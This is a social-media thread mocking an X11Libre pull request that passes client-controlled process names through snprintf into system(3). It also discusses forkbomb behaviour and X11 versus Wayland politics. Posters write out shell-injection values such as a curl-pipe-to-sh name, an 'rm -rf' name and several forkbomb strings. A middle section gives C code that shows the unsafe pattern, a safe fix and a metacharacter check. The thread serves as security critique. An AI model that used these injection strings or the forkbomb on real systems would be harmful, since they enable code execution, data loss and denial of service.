Conversation

this is truly incredible: https://github.com/X11Libre/xserver/pull/1627/files

they are using system(3) inside a security-critical domain (the display server).

but yes, sure, my refusal of xlibre on security grounds is the problem


@ariadne
`system("which dialog > /dev/null 2>&1")`

that is just *chef's kiss*


@ariadne great goddess of the end, what the hell are they smoking??

@ariadne Quectel-tier code (Quectel EG25-G firmware used system(3) too). I don't think even metux would accept this PR, but he does seem to have reviewed it and didn't mention use of system(3) as a problem.

Edit: Originally this post said "Qualcomm" instead of "Quectel". I thought Quectel was owned by Qualcomm for some reason, but this appears to be untrue.

@ariadne

system("python3 /usr/bin/totally_secure_thing.py");

👍


@ariadne
breaking news: the x11 fork for chuds learning in realtime why it's useful to keep gay furries on your security team


@noisytoot system(3) should NEVER be used in a privileged security context, you can do all sorts of nasty things

@ariadne I know, Quectel's use of it resulted in CVE-2021-31698 (arbitrary code execution as root)

🌸 lily 🏳️‍⚧️ flag_pansexual flag_ace θΔ & ∞

@ariadne oh my fucking god why are they doing it like that


@Dio9sys @ariadne (cry can't we have a managed x11 fork that keeps the gay furries involved? pretty please? Ill create it if we need it)


@ariadne from what I can tell they aren't even properly escaping the process name, so a binary named e.g. ';curl virus|sh could execute arbitrary code, but I might be misreading it


@ariadne the x server for fascists is made by idiots. making it less secure in combination of being in a time where multiple desktops are completely abandoning the X Window System in favor of wayland. absolute cinema


🌸 lily 🏳️‍⚧️ flag_pansexual flag_ace θΔ & ∞

@ariadne also why is it suddenly on github


@tauon hasn't it always been on github?


@ariadne which is….. less than ideal


@ariadne Am I reading this right? If the client controls its own process name it can write anything into 'text' which will eventually be expanded via %s in a format string which is passed to system? flan_think


🌸 lily 🏳️‍⚧️ flag_pansexual flag_ace θΔ & ∞

@ariadne i swear it was on some alternate forge for a while


@ariadne Wait, so I just need to sneak in a binary named zenity to the front of the PATH to get it executed in an elevated security context?


@ariadne In an academic sense, how bad is this actually? Assuming that X11 is already up and running before anybody can log in (no LD_PRELOAD or ENV fuckery) and "which" is a root-owned binary.


@developing_agent there's a few different ways to exploit it

- if you can control PATH (or the binaries in the directories referenced by PATH), you can run whatever you want in an elevated context

- there is an unescaped %s format string passed directly to the dialog application, that %s is a window title

- probably other things i'm not thinking about right now


@ariadne @Dio9sys i mean i'm specifically asking about x11/xorg here because *waves hands* old hardware support too?


@erikarn @Dio9sys yes, we are working on enabling 2D-only compositing in wayback


@ariadne From the geniuses who brought you ‘trying to use ^ for exponentiation in C’

@ariadne Also… do they not know about xmessage?

But well of course it's all just yuck yuck yuck anyway.

@erikarn @Dio9sys @ariadne I mean come on guys, it might be silly but what is the danger? they're calling which

If you have a compromised version of which on your computer or in your PATH you're already boned. So this is a bit of an overreaction. We don't need to dork dunk on people all the time.

@ariadne Yeah, the %s used to build the commands used by "system(command)" is definitely unsafe.

I'm having a hard time thinking how the constant string calls could be exploited though. (PATH should already be inherited from when X was started?)

I 100% expect there's someone with more knowledge of the deep magic that could exploit them, being as they're dragging in so much external state, but I dunno how.


@ariadne wow there's so many issues with that commit I don't even know where to start.


@ariadne Oh come on, *everything* needs to have a permission system built into it. It's for the children. And then I can take credit for it and brag about it.


@e_nomem @ariadne which (at least on... wherever I last read the manpage) doesn't start with PATH, annoyingly - it starts with some built-in paths like /bin for Some Fucking Reason.

(that doesn't excuse this very funny "security-feature", of course)


@erikarn @Dio9sys nothing to link yet, but someone gave a talk at XDC about their plans to build a generic 2D compositing library for non-GPU chips (e.g. old school accelerated VGA chips), which could be used as a backend for wlroots


@barometz The "security-feature" is just *chef's kiss*

I was actually thinking that, if the user is not legitimately using zenity, getting a binary named zenity _anywhere_ in the PATH is sufficient to pop the box since it's checked first.

That's putting aside a process that names itself something like "'; rm -rf --no-preserve-root /; echo"

@ariadne


@ariadne they should fully spell out "/usr/bin/which". Bam, fixed it.


@feld @Dio9sys @erikarn @ariadne There's at least one place where they're building commands using sprintf, with what at a cursory glance looks like "user-provided data", then simply call system(command) (line 660 in file shm.c, I suspect that client_name is under attacker control).

So, not guaranteed to be exploitable, but...


@vatine @feld@friedcheese.us @Dio9sys @erikarn

yes, this is not about using which at all. it is about the system(command) at line 660.

also there is xmessage(1) which is already part of the X11 distribution


@ariadne @erikarn @Dio9sys I admire Wayback for putting Wayland in the place where it makes sense and leaving the X11 protocol intact.


@e_nomem @barometz @ariadne I'm not sure how you'd do it though? Since $PATH is going to be inherited from whenever X started?


@developing_agent @e_nomem @barometz the real problem isn't the which stuff, it is the system(command) later that was generated using sprintf()


@vatine @feld @Dio9sys @erikarn @ariadne As the saying goes, even the biggest fool can create a security system he himself can see no problems in.


@developing_agent Admittedly a load-bearing 'just' in my comment above. It's not necessarily easy to do for a malicious actor.

@barometz @ariadne

@ariadne I love that the main xlibre dev reviewed this and didn't spot the glaring issue

@ariadne and they copy-pasted identical code 3 times...?!???? 🙃


@ariadne system(), the gift that keeps on giving.

But the whole patch looks very wtf.


@ariadne promote code that makes you happy 😀


@ariadne The author's primary motivation seems to be bragging about it 🙃 https://github.com/X11Libre/xserver/pull/1627#discussion_r2609127512


@ariadne ngl I'd straight up forgotten that system(3) even existed since using it is such a bad idea


@ariadne
Holy shit I thought that was eradicated like almost 30 years ago.
For the love of God, Montressor!


@ariadne would guess that even CoPilot would not write this kind of stuff. But you never know… the real surprise is that this made it into a commit at all, was everybody sleeping?

@ariadne@treehouse.systems

  • reads toot
  • vague confusion
  • man 3 system
  • HOLY FORKING SHIRTBALLS
Yeah, that's baaaaad.

@ariadne @Dio9sys that's pretty neat looking.

Thing is, the SGI hardware i'm hacking on doesn't even expose a linear framebuffer. It ranges from "you get to blit things into the framebuffer, but you need to use DMA/PIO to read/write regions if you're not doing shapes" to "oh yeah i have a framebuffer but it's in like 32x32 or 64x64 tiles.

I'm filling in the missing ye olde acceleration stuff for the newport graphics x11 acceleration. It's tedious, but fun. No linear framebuffer.


@ariadne i feel like there's no good way to do what they're doing without the xserver drawing the prompt itself, or some sort of tight coupling with the wm/xcompositor


@ariadne which is what the portal->compositor<->pipewire dance is doing, and that's window system independent... what a joke


@ariadne calling this “security-feature” is insane 😭


@noisytoot any pointers? We had some in a service called qcmap which should be fixed. Is this what you are referring to? @ariadne


@ariadne uuughhhhh! also, "which" isn't posix, you should use "command -v"


@erikarn @Dio9sys @ariadne why do we need an X11 fork. wayland is the thing actually being maintained, the X11 chud fork literally only exists due to opportunism

@canacar @ariadne I was referring to https://blog.nns.ee/2021/04/03/modem-rce. I thought that Quectel was owned by Qualcomm for some reason, but it appears that it's not.

@erikarn @ariadne @Dio9sys any chance of @tde looking into wayback? it seems promising, possibly as an experimental branch or some sort of toggleable setting so TDE can use a display server that takes advantage of newer GPUs a bit better

not true

@haematophage @Dio9sys @ariadne@treehouse.systems

xenocara


@noisytoot thanks! Some of their modules do use Qualcomm chips, but I guess this is not one of those. @ariadne


@erikarn @ariadne @Dio9sys yes please!

(Not going to use Wayland. A few of the ways I use X are fundamentally inimical to its base design concepts. But I do need a way to run Wayland programs (not entire sessions) under X.)


@andreaskem @ariadne
That's the more harmless part - a bit further down it's way more fun, there the commands for zenity etc. are built with `snprintf()` and string (%s) arguments like `client_name` or `window_name` - and also run with `system()`

@ariadne ok, so what? it's a fixed command string, no parameters are passed which could be escaped, if your `which` is compromised you are done for either way. I see nothing wrong with it.

@gorplop so you think that this code will be okay when it encounters a process named " && (){ :|:&; }; :& ? why do you think that? just wondering.


@gorplop and if you think that is not possible, you may want to read about setprocname(3) and setproctitle(3).

@ariadne oh well, ok, that code sucks. Still, that's an open PR.

@gorplop an open PR which metux has reviewed but not rejected. the point is that there is no acceptable quality control in Xlibre given the privileged nature of display servers.


@gorplop as this is a process and leadership problem, there are hundreds more which have been merged. many of which have been unmerged in upstream.


@noisytoot this is pretty typical vendor-grade code sadly, I've literally seen system("echo blah") to write output even.


there are quite a few reactionaries in my comments, some of which have been defederated in their entirety.

for the others:

1. although the system("which ...") use is silly, that isn't the problem here.

2. what do you think will happen when the code in this PR encounters a process named `" && :() { : | : & }; :&`? will it safely handle such a process name? before saying "that's impossible" please read setprocname(3), setproctitle(3), or in the case of Linux, understand that argv[0] is mutable.

3. yes, it is an open PR. it is also reflective of the code quality of many other PRs which have been merged to Xlibre already. how do you think that impacts its security record?

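As an added example that is not code from the PR or from X11Libre: the snprintf-into-system(3) pattern the thread describes, fed a constructed hostile process name, beside an argv-based replacement that never hands the string to a shell. The function names (build_shell_command, build_dialog_argv, has_shell_metachar, spawn_argv) and the zenity command line are assumptions for illustration.

```c
/* Added example, not code from the X11Libre PR. Function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <spawn.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* The pattern under discussion: a client-controlled string is pasted into a
 * command line that system(3) would hand to "/bin/sh -c". This only builds
 * the string so it can be inspected; it is never executed here. */
int build_shell_command(char *out, size_t outlen, const char *client_name)
{
    int n = snprintf(out, outlen, "zenity --title \"%s\" --question", client_name);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Shell-free replacement: each value becomes exactly one argv element, so no
 * shell ever parses it and metacharacters in client_name carry no meaning. */
int build_dialog_argv(const char *client_name, const char **argv, size_t max)
{
    if (max < 5)
        return -1;
    argv[0] = "zenity";
    argv[1] = "--title";
    argv[2] = client_name;   /* passed verbatim, as a single argument */
    argv[3] = "--question";
    argv[4] = NULL;
    return 0;
}

/* Review/logging aid: does the string contain characters /bin/sh treats
 * specially? This is a detection check, not a sanitiser; the fix is argv. */
int has_shell_metachar(const char *s)
{
    return strpbrk(s, ";&|`$()<>\"'\\ \t\n") != NULL;
}

/* Run an argv directly (no shell) and return the child's exit status, or -1.
 * posix_spawnp searches PATH like execvp; pass an absolute path in argv[0]
 * when the caller must not trust PATH. */
int spawn_argv(const char *const argv[])
{
    pid_t pid;
    int status;
    if (posix_spawnp(&pid, argv[0], NULL, NULL, (char *const *)argv, environ) != 0)
        return -1;
    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample: a client that renamed itself to something hostile. */
    const char *name = "\"; echo injected; \"";
    char cmd[256];
    const char *argv[5];

    build_shell_command(cmd, sizeof cmd, name);
    printf("shell would parse : %s\n", cmd);      /* three commands, not one */
    build_dialog_argv(name, argv, 5);
    printf("argv[2] literally : %s\n", argv[2]);  /* one argument, verbatim */
    printf("metacharacters    : %s\n", has_shell_metachar(name) ? "yes" : "no");
    return 0;
}
```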

@ariadne what the actual fuck did i just read

politics?

@ariadne I think @q66 made a comment once that hit the nail on the head that the ppl who rail against dei and vocally say they put code quality first tend to have very poor code quality


@ariadne “Oh yeah? You enjoy security? You know what?” deletes your security mario_flop


🎄🏳️‍🌈🎃🇧🇷Luana🇧🇷🎃🏳️‍🌈🎄

@ariadne

sure, my refusal of xlibre on security grounds is the problem

Even if there weren't security problems, it should still be refused

no fucking way 😭

and yes, sometimes i post these things as bait to find out if we are missing alt-right reactionary servers that we need to defederate. it's like vaccines but for social media ❤️


by the way, the ":() { : | : & }; :&" part earlier? that's a forkbomb. don't run it unless you want to deal with the consequences of running a forkbomb (in most cases, hard rebooting).

@ariadne In fact I've yet to find a system where you're not stuck with hard-rebooting in case of the shell fork-bomb.
Softer ones where it just spawns processes in a loop but stays open being much easier to deal with.

@lanodan if you ctrl-c immediately and then kill all shells, it should recover :)))

@ariadne Better go real fast on this one, at least I remember that trying to make killall do this was a lesson in futility because by the time it would have done its loop over proc, other processes would have spawned.

@haematophage @Dio9sys
TLDR: X11 forks are going to run into problems,

Problem is, X11 as protocol has problems, which can't be (neatly) resolved without creating X12 which would need a compatibility layer for X11.
At this point developers decided to not carry the burden and started over.

Not to mention the Xorg code base and quirks. You can test developers on that. I would doubt devs not swearing like a sailor within minutes.

@gom @Dio9sys what are the problems with the protocol that cannot be resolved?

@ariadne Why is the X11 server a security boundary on your setup neobot_sweat

Anything that has X11 access should be assumed to have at least the same privs as the user running the X11 server (which is hopefully just the regular user that owns the session)

NaziXorg X11Libre has a whole lot of other shit to laugh at it for


@ity so this code will be fine if it encounters a process named `(){ :|:& }; :&`?


@lanodan @ariadne I am half tempted to try on mine cuz I am pretty sure I will just hit the process ulimit and it will terminate gracefully when I close the parent process of all of them (the term em)


@ariadne I don't see how that's relevant to what I said


@ariadne Wait, they taste good? Why did nobody tell me afore?

@ity @ariadne they also introduced their own(bad) extension meant to introduce sandboxing, so clearly they want their software to be a security boundary

@ariadne I won a bet with a professor in university using this. He said there was no way my regular user account could bring down the system.


Haelwenn /элвэн/ triskell 🔜FOSDEM

@ity @ariadne Closing the parent process won't have an effect, especially as it's backgrounded.
(Otherwise you'd have to use nohup, which doesn't look as cryptic)


@lanodan @ariadne If I remember right, & does not reparent it to pid1, but rather to the session leader, which should get killed when the terminal emulator dies

But I should actually check, true. I will probably test in a VM. I have played around with it in a cgroup but yk.


@haematophage @Dio9sys
Colour format in X11 is 32bit (rgb+alpha, each 8bit). HDR won't work without redefining the colour format. 40bit with 10bit for each channel or 10bit rgb, 2bit alpha (wtf?!, but this was floated for XLibre)

Isolating applications, it's part of Wayland, but not part of X11 and Xorg. Xlibre introduced a namespace extension, providing optional security if this extension is used.
"Optional security" most of the time is equal to "no security, but warm feelings".. Just don't!


@Mae @ariadne oh right that happened, I forgot x3 Tbh whatever they want should be ignored (and so should their broken software)

I am mostly ignoring them atp, not worth my energy


@ity at any rate, it is a security boundary because it mediates access to data between processes. they have also added their own extension to further mediate access to data between processes. this extension is, like the X Security extension before it, comically bad.

also: please understand security fundamentals beyond that of simple UNIX user accounts

@ariadne Do you have any plans to share the list of alt-right servers that're good to defederate?

Asking for a me.

@ariadne I would say defining security boundary as "mediates IPC" is not really gonna match how most entities see it. It might match what X11Libre thinks, but def not what X.org thinks, and you are gonna have a really bad time expecting X.org Server to fulfill any expectations one would have of a security boundary.

As for "security fundamentals beyond Unix accounts", I don't see where A, you are getting from that I don't, and B, what do you mean to say.

Instead of assuming what I do or do not know, just state what you actually mean to say.


Haelwenn /элвэн/ triskell 🔜FOSDEM

@ity @ariadne Yeah, & keeps it to the session leader, but you'd need a session leader which sends a SIGTERM/SIGKILL to its process group before exiting, and I don't think any terminal emulator does that.

At least sending the kill to a process group would be more effective against a forkbomb than killall(1), but also more damaging. (But of course better than ultimately hard-rebooting)

@gom @Dio9sys

A) i am not a professional photographer and i imagine that very few linux users are, so compatibility with a colour format that is barely even implemented in industry-grade technology is at the bottom of my list of "things that need to be solved at any cost"

B) this is not a problem with the protocol, this is a way you would like things to operate so that you can have warm feelings. Wayland takes a steak knife and gives me a butter knife instead, because if somebody could walk in and stab me with a steak knife. When I point out that I like steak and lock my door, they tell me that if i really need to cut steak I should tell the butcher to add support for butter knives.

@lanodan @ariadne It has been a while since I worked on term-ems and shells

I would assume that while it doesn't SIGKILL, it ends up with the child dying, and iirc the term-em is the session leader, or the main interactive shell instance, both of which should end up dying

But atp I should just go read what *sh, some random term-em, and the kernel do, because I'm atm pulling it outta my ass as I forgot x3


@haematophage @Dio9sys
A) "It's not part of my use case and I doubt, that this interests a lot of people" is not how one should design a protocol.
On the other hand, proper screen and HDR videos is just nice and works with wayland without having "professional" needs.

B) What?

@gom @Dio9sys A) that's exactly how Wayland is designed, though. "We won't implement client side decorations because we don't want them". B) I'm sure you can understand how "Taking away the ability to do something because malicious actors could do bad things with it" applies in the case of application sandboxing. I know you're smart enough.

@ariadne You're not like surprised by this I hope. 90% of Nazis are incompetent And Xlibre didn't get any of the actually dangerous ones


@haematophage @Dio9sys Really, I can't follow you.
CSD should work with wayland?! SSD is WIP (https://wayland.app/protocols/xdg-decoration-unstable-v1)

Framing properly defined data flows as "taking away". I just can't..

@gom @Dio9sys "why would you ever want to run a program that doesn't do things the way i think it should?? are you some kind of stupid person?"

@astraleureka why would anyone ever do that!? I can't believe they don't know about printf

@lanodan @ariadne

Just tried it here (ghostty in GNOME).

Noticeably slowed down the system. After a while it ran out of pids and the bashes started spewing error messages, and I could no longer open new terminals.

Closed the terminal tab and after a few seconds the user manager killed the rest of the cgroup, resolving the forkbomb. It ended up starting about 500000 processes before it got killed.

Ptyxis and GNOME Terminal behaved similarly.

@gom @Dio9sys "i dont understand, there's an unstable optional extension to the protocol that means some implementations can maybe do a thing you like, why are you not switching?" (edit: i notice i wrote the wrong thing, i meant server side decorations. i rewrote the sentence a couple times switching between "we're only implementing CSD because we think that's what you should want" and "we won't implement SSD because we don't want to" and clearly i did not make sure the whole sentence was oriented one way before hitting send)

@lanodan @ariadne

So I believe the reasons this was that the system manager limited my user to 73487 pids, and the user manager limited the terminal to 33403 pids. In the case of Ptyxis and GNOME Terminal, the tabs use separate scopes and each has the limit. ghostty uses custom sub-cgroups sharing the terminal's limit.

If I wasn't using a desktop environment that starts apps as user services, I think I still could have logged in as root and killed the forkbomb manually.


@gom

HDR is actually becoming increasingly used in gaming!


@aismallard i am increasingly feeling that sticking to x11 is fash-coded


@leo literally reactionary (clinging to a false past that never really existed)


@leo Speaking of which I need to stop being lazy and switch to wayland. I have some things set up but I just have been super putting it off


@Dio9sys @ariadne I mean at this point, we might as well put a gay trans furry directly on the X11 board of directors.

Oh wait @Lyude


TheEvilSkeleton 🇮🇳 🏳️‍⚧️

@ariadne I think the bigger issue is the fact that, if I understand correctly, none of these labels are translatable


@TheEvilSkeleton i mean, accessibility seems important in a vista UAC-like feature, yes


@mos_8502 @ariadne you can even bring down the whole hypervisor by running it in a VM.


@ariadne or replace the hardware. A student ran a forkbomb. The PC got hot and ran for a weekend with all fans at max. Week after: fan error. The fan controller, hard soldered to the main board, was faulty.


@ariadne To be fair, that's just a PR and hasn't been merged... But since the author is listed as a previous contributor, that's not inspiring confidence? :S

Also, to their credit, they added whitelist-based string sanitisation! For printing into their char text[1024]—C code like it's 1990 🤟

Looks also like two of the maintainers have said "no" to the PR.


@ariadne btw isn't this the guy also "maintaining" WinRing0? THAT actually spooks the living heck out of me.


@ariadne @voidanix it's a hack/driver for allowing unprivileged programs to access hardware devices, like for example LED RGB control programs


@ariadne @gorplop I mean, the dude probably just skimmed through the PR and left only _one comment_, not a proper approval/rejection.

Anyone can put up PRs as bad as this one on other projects, but nobody goes running around saying stuff like "oh systemd has this open PR, this project is awful!". I get Xlibre is a meme but I'd rather look at merged code.

@ariadne @developing_agent wouldn't it just be more efficient to send them a comment on the pull request instead of posting on the Fediverse where they'll never see it though

edit: and who can control the X server's PATH except root?

@feld @developing_agent @ariadne Somehow, through some weird observation I cannot understand, I don't think that helping the PR author, or even notifying the PR author about that possibility was ever the intention of this thread.

No idea how I came to that conclusion though.

@phnt @feld @developing_agent @ariadne especially as this is a first time contributor to that repo, and the maintainers have already commented the same thoughts half a day ago

@i @phnt whoa whoa whoa did we just let facts into this thread? that seems dangerous

@lanodan @ariadne it can be made survivable in terminals which do a cgroup per shell – e.g. libvte in a systemd environment sets a tasks.max on each cgroup (capping it to like 10% or 33% of the system's global maximum from what I remember), so the rest of the system will stutter but keep more-or-less running.

(yes I have tried it, a while ago; did not try closing the window, but was able to 'systemctl --user kill' the whole tab from another tab.)

IIRC ghostty also has support for cgroups (also relying on systemd's API)... otherwise .profile could migrate self on shell startup, if something like openrc at least creates a per-user cgroup with unprivileged write access.

(in theory the terminal could also use the cgroup interfaces to either freeze or sigkill the entire cgroup at once without looping over pids/pgrps, but I don't think any terminal does that yet.)


@Dio9sys @gom yeah, framing HDR display support as some niche professional thing is weird. do you not like your movies looking better?


@ariadne my friend has a tattoo of this which i think is kinda cool


@ariadne Setting aside the obvious security problems, would this even work?

It essentially has the X server block waiting for an X client to run and exit. And some of the prompt programs it might run appear to be ncurses text mode clients. Where are they going to display to?
